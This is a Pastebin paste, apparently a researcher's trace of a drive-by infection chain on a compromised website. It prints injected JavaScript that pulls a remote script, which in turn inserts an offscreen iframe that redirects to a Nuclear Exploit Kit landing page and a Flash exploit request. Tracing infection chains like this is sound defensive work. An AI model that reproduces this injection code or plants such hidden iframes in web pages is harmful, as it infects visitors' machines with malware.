Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!-- http://www.projectrace.com/tag/beyonce contans the following JS section. Note request for 'http://projectrace.com/historyandresults/main_configs/watch.php' -->
- <!--visitorTracker--><script type="text/javascript" id="id_2446571">
- var visitortrackerin = setInterval(function(){
- if(document.body != null && typeof document.body != "undefined"){
- clearInterval(visitortrackerin);
- if(typeof window["globalvisitor"] == "undefined"){
- window["globalvisitor"] = 1;
- var isIE = visitortrackerde();
- var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc.";
- if(visitorTracker_isMob()){
- var visitortrackervs = document.createElement("script"); visitortrackervs.src = "http://projectrace.com/historyandresults/main_configs/watch.php?mob=1"; document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
- }else{
- if((isIE && !isChrome && !visitorTracker_isMob())){
- var visitortrackervs = document.createElement("script"); visitortrackervs.src = "http://projectrace.com/historyandresults/main_configs/watch.php"; document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
- }
- }
- }
- visitortracksdel();
- }
- },100);
- <!-- When 'http://projectrace.com/historyandresults/main_configs/watch.php' is requested, the following code is delivered. Note the value of 'iframe_name' variable -->
- function trackfunc(){
- var iframe_name = "<div style='position:absolute;left:-3532px;'><iframe width='10px' src='http://vovinutrysiki.gq/052F' height='10px'></iframe></div>";
- var divs_name = document.getElementsByTagName('div');
- var isIE = visitortrackerde();
- var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc.";
- if(isIE && !isChrome){
- if(divs_name.length == 0){
- document.body.innerHTML = document.body.innerHTML+iframe_name;
- }else{
- var dl_name = divs_name.length;
- var mid_name = Math.floor((dl_name/2));
- divs_name[mid_name].innerHTML = divs_name[mid_name].innerHTML+iframe_name;
- }
- }
- }
- <!-- Request for 'http://vovinutrysiki.gq/052F' returns the following iframe -->
- <html>
- <div style='left:-2874px;position:absolute;'>
- <iframe height='6px' src='http://zalypkavovana.cf/search?q=5d97a47&A3n=86eee856fd&Ye2hiYw=e&2hd=aWV9TVxtF&Osh0=gBf&W9Itm9D=fA&GGCr=dV9WH&RL8=cAxPU&RPwp3zH=bXVZQQgxFBE1NUw9AQFpWR' border='1' width='9px' frameBorder='0'></iframe>
- </div>
- </html>
- <!-- 'http://zalypkavovana.cf/search?q=5d97a47&A3n=86eee856fd&Ye2hiYw=e&2hd=aWV9TVxtF&Osh0=gBf&W9Itm9D=fA&GGCr=dV9WH&RL8=cAxPU&RPwp3zH=bXVZQQgxFBE1NUw9AQFpWR' is a landing page for Nuclear Exploit Kit. Below is an example of Adobe Flash Player exploit request -->
- http://zalypkavovana.cf/cart?RJtDHXC=fLVA8K&VQR=5f44e083c&M8s7=aVUlHTg5eV0FYTldFAQRLSAJVSUFc&I6X=d1QL&6cc=eAwl&Owc=2c8fc0fb3d&EJt=cGAFAXAQEDTlINBAABA&6tXJa=bUxVWRlBZU01aVk0GAE0MAh8
Add Comment
Please, Sign In to add comment